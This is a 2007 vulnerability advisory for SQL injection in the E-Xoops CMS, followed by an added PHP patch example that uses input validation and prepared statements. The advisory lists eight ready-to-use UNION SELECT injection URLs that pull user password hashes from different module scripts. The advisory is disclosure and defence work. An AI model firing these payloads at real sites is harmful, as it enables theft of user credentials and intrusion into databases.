
exoops-sql.txt

Posted on 11 December 2007

############################################
E-xoops multiple variable/scripts SQL injection
vendor url: http://www.e-xoops.com
Advisory: http://lostmon.blogspot.com/2007/12/e-xoops-multiple-variablescripts-sql.html
vendor notify: NO
exploits available: YES
############################################

E-xoops is a content-community management system written in PHP-MySQL.

E-xoops contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the scripts not properly sanitizing user-supplied input to the 'lid', 'bid' and 'gid' variables in multiple scripts. This may allow an attacker to inject or manipulate SQL queries in the backend database.

#################
Versions:
#################

E-Xoops 1.08
E-Xoops 1.05 Rev3
E-Xoops 1.05 Rev2
E-Xoops 1.05 Rev1
and possibly earlier versions.

#################
Solution:
#################

No solution available at this time. Try to edit the source code. You can look at this post in my group to patch E-xoops, because the source code is very similar to bcoos cms:
http://groups.google.com/group/lostmon/browse_thread/thread/59f3b836fad5b009

and here you have a source reference for E-xoops 1.0.8:
http://phpxref.com/xref/exoops/nav.html

#################
Timeline:
#################

Discovered: 25-11-2007
vendor notify: --------
vendor response: -------
disclosure: 09-12-2007

#################
SQL injections:
#################

http://localhost/e-xoops/modules/mylinks/ratelink.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/adresses/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mydownloads/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mysections/ratefile.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/myalbum/ratephoto.php?lid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/banners/click.php?bid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=show_stats&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

####################
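The advisory's only remedy is to patch the source by hand, so the following shows the shape of such a patch. This is an added example, not E-Xoops code and not the patch from the lostmon group post: the vulnerable pattern in the comment is the assumed shape of an id (lid/bid/gid) concatenated into a query, and the table name, column names, connection parameters and the function names validate_id and fetch_link_title are all assumptions. The fix has two parts: the id is accepted only if it is a strictly positive decimal integer, and it is then bound as an integer parameter of a mysqli prepared statement so it never becomes part of the SQL text.

```php
<?php
// Added example (not E-Xoops code). Table/column names are assumptions.

// --- Assumed vulnerable shape, for contrast only ---------------------------
// $lid = $_GET['lid'];
// $sql = "SELECT title FROM e_xoops_links WHERE lid=" . $lid;
// A value such as "-1 UNION SELECT pass FROM e_xoops_users LIMIT 1" is
// spliced straight into the query, which is the class of bug the advisory
// reports for lid, bid and gid.

/**
 * Accept an id parameter only as a strictly positive decimal integer.
 * Returns null for a missing value, a sign, whitespace, or any SQL syntax.
 */
function validate_id(array $params, string $name): ?int
{
    if (!isset($params[$name]) || !is_string($params[$name])) {
        return null;
    }
    $raw = $params[$name];
    // ctype_digit() is true only for a non-empty string of 0-9, so
    // "-1", "1 UNION ...", "" and "1.5" are all rejected here.
    if (!ctype_digit($raw)) {
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/**
 * Hardened lookup: the id is bound as an integer parameter, not interpolated.
 * (Assumed table e_xoops_links with columns lid and title.)
 */
function fetch_link_title(mysqli $db, int $lid): ?string
{
    $stmt = $db->prepare('SELECT title FROM e_xoops_links WHERE lid = ?');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $lid);
    $stmt->execute();
    $stmt->bind_result($title);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? $title : null;
}

// Constructed inputs: the advisory's payload, a negative id, and a sane id.
$samples = [
    ['lid' => '-1 UNION SELECT pass FROM e_xoops_users LIMIT 1'],
    ['lid' => '-1'],
    ['lid' => '42'],
];
foreach ($samples as $params) {
    $lid = validate_id($params, 'lid');
    echo var_export($params['lid'], true), ' => ',
         ($lid === null ? 'rejected' : "accepted as $lid"), PHP_EOL;
}
// Output: the first two are rejected, the last is accepted as 42.

// Request handling as a rate script like ratelink.php would do it:
// $lid = validate_id($_GET, 'lid');
// if ($lid === null) { http_response_code(400); exit('invalid lid'); }
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'exoops'); // assumed
// echo fetch_link_title($db, $lid);
```

The integer check alone already defeats the UNION payloads listed above, but the prepared statement is the part worth keeping across every script the advisory names: it makes the query safe regardless of how the parameter is later reused, and it is the same change whether the parameter is called lid, bid or gid.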
